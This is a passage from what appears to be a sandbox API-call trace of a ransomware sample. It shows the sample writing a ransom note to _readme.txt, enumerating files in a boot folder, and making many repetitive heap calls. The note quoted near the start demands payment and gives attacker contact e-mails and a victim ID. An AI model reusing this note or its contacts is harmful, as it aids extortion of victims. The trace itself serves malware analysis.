ID:\r\n0224yiuduy6S5d9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR", lpUsedDefaultChar=0x0) returned 1116 [0142.839] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x321dfc8 [0142.839] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325d510 | out: hHeap=0x620000) returned 1 [0142.839] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3221ae8 | out: hHeap=0x620000) returned 1 [0142.839] lstrlenA (lpString="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-xcn1Dtzak4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@firemail.cc\r\n\r\nYour personal ID:\r\n0224yiuduy6S5d9UR8CEfVlhGJx3jwwXdVqZ3owpwVZwN7BjVbRUSR") returned 1115 [0142.839] WriteFile (in: hFile=0x6f0, lpBuffer=0x321dfc8*, nNumberOfBytesToWrite=0x45b, lpNumberOfBytesWritten=0x9dbfb64, lpOverlapped=0x0 | out: lpBuffer=0x321dfc8*, lpNumberOfBytesWritten=0x9dbfb64*=0x45b, lpOverlapped=0x0) returned 1 [0142.840] CloseHandle (hObject=0x6f0) returned 1 [0142.840] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x321dfc8 | out: hHeap=0x620000) returned 1 [0142.840] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ab03c8 | out: hHeap=0x620000) returned 1 [0142.840] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ad6f98 | out: hHeap=0x620000) returned 1 [0142.840] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aaf2b8 | out: hHeap=0x620000) returned 1 [0142.840] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.840] FindFirstFileW (in: lpFileName="C:\\Boot\\nl-NL\\*", lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xc8be5670, ftLastAccessTime.dwHighDateTime=0x1d62438, ftLastWriteTime.dwLowDateTime=0xc8be5670, ftLastWriteTime.dwHighDateTime=0x1d62438, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3275b30 [0142.841] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.841] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xc8be5670, ftLastAccessTime.dwHighDateTime=0x1d62438, ftLastWriteTime.dwLowDateTime=0xc8be5670, ftLastWriteTime.dwHighDateTime=0x1d62438, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0142.841] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe84c457e, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0142.841] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc8be5670, ftCreationTime.dwHighDateTime=0x1d62438, ftLastAccessTime.dwLowDateTime=0xc8be5670, ftLastAccessTime.dwHighDateTime=0x1d62438, ftLastWriteTime.dwLowDateTime=0xc8be5670, ftLastWriteTime.dwHighDateTime=0x1d62438, nFileSizeHigh=0x0, nFileSizeLow=0x45b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0142.841] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc8be5670, ftCreationTime.dwHighDateTime=0x1d62438, ftLastAccessTime.dwLowDateTime=0xc8be5670, ftLastAccessTime.dwHighDateTime=0x1d62438, ftLastWriteTime.dwLowDateTime=0xc8be5670, ftLastWriteTime.dwHighDateTime=0x1d62438, nFileSizeHigh=0x0, nFileSizeLow=0x45b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0142.841] FindClose (in: hFindFile=0x3275b30 | out: hFindFile=0x3275b30) returned 1 [0142.841] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.841] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1730 | out: hHeap=0x620000) returned 1 [0142.841] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1730 [0142.841] PeekMessageW (in: lpMsg=0x9dbfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9dbfb74) returned 0 [0142.841] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.841] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aafb40 [0142.841] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.841] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.841] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.841] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aafb40 [0142.841] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.841] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.841] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.841] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aafb40 [0142.841] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.841] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.841] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.841] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aafb40 [0142.841] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.841] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.842] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.842] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aafb40 [0142.842] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.842] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.842] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.842] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x9aafb40 [0142.842] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.842] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.842] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.842] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aafb40 [0142.842] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x325d510 [0142.842] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.842] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325d510 | out: hHeap=0x620000) returned 1 [0142.842] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.842] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.842] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aafb40 [0142.842] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.842] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.842] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.842] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x9aafb40 [0142.842] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.842] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.842] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.842] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3221ae8 [0142.842] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3221ae8 | out: hHeap=0x620000) returned 1 [0142.842] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.842] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.842] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3221ae8 [0142.842] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3221ae8 | out: hHeap=0x620000) returned 1 [0142.842] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.842] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.842] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aafb40 [0142.842] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.842] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.842] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.842] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aafb40 [0142.843] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.843] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.843] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.843] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x9aafb40 [0142.843] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.843] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.843] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.843] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x9aafb40 [0142.843] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.843] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.843] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.843] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aafb40 [0142.843] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.843] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.843] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.843] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aafb40 [0142.843] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.843] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.843] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.843] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aafb40 [0142.843] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.843] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.843] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.843] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aafb40 [0142.843] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.843] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.843] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.843] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aafb40 [0142.843] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.843] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.843] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.843] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aafb40 [0142.843] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.843] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.843] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.844] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aafb40 [0142.844] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.844] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.844] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.844] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aafb40 [0142.844] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x325d510 [0142.844] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.844] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325d510 | out: hHeap=0x620000) returned 1 [0142.844] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.844] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.844] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aafb40 [0142.844] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.844] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.844] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.844] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aafb40 [0142.844] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x325d510 [0142.844] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.844] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325d510 | out: hHeap=0x620000) returned 1 [0142.844] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.844] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.844] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3221ae8 [0142.844] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3221ae8 | out: hHeap=0x620000) returned 1 [0142.844] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.844] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.844] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3221ae8 [0142.844] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3221ae8 | out: hHeap=0x620000) returned 1 [0142.844] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.844] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.844] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aafb40 [0142.845] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.845] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.845] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.845] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aafb40 [0142.845] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.845] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.845] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.845] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aafb40 [0142.845] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x325d510 [0142.845] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.845] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325d510 | out: hHeap=0x620000) returned 1 [0142.845] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.845] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.845] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x9aafb40 [0142.845] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.845] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.845] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.845] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x9aafb40 [0142.845] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.845] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.845] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.845] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aafb40 [0142.845] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.845] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.845] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.845] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aafb40 [0142.845] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.845] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.845] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.845] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aafb40 [0142.845] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.845] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.845] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.846] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aafb40 [0142.846] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.846] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.846] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.846] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aafb40 [0142.846] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.846] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.846] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.846] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aafb40 [0142.846] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.846] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.846] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.846] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aafb40 [0142.846] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.846] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.846] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.846] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aafb40 [0142.846] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x325d510 [0142.846] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.846] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325d510 | out: hHeap=0x620000) returned 1 [0142.846] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.846] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.846] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aafb40 [0142.846] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.846] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.846] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.846] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3221ae8 [0142.846] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3221ae8 | out: hHeap=0x620000) returned 1 [0142.846] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.846] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.846] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3221ae8 [0142.846] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3221ae8 | out: hHeap=0x620000) returned 1 [0142.846] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.846] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.847] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aafb40 [0142.847] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.847] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.847] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.847] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aafb40 [0142.847] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.847] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac21a8 | out: hHeap=0x620000) returned 1 [0142.847] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac21a8 [0142.847] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aafb40 [0142.847] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x325d510 [0142.847] HeapFree (in: hHeap=0x620000, dwFlags=0x0, 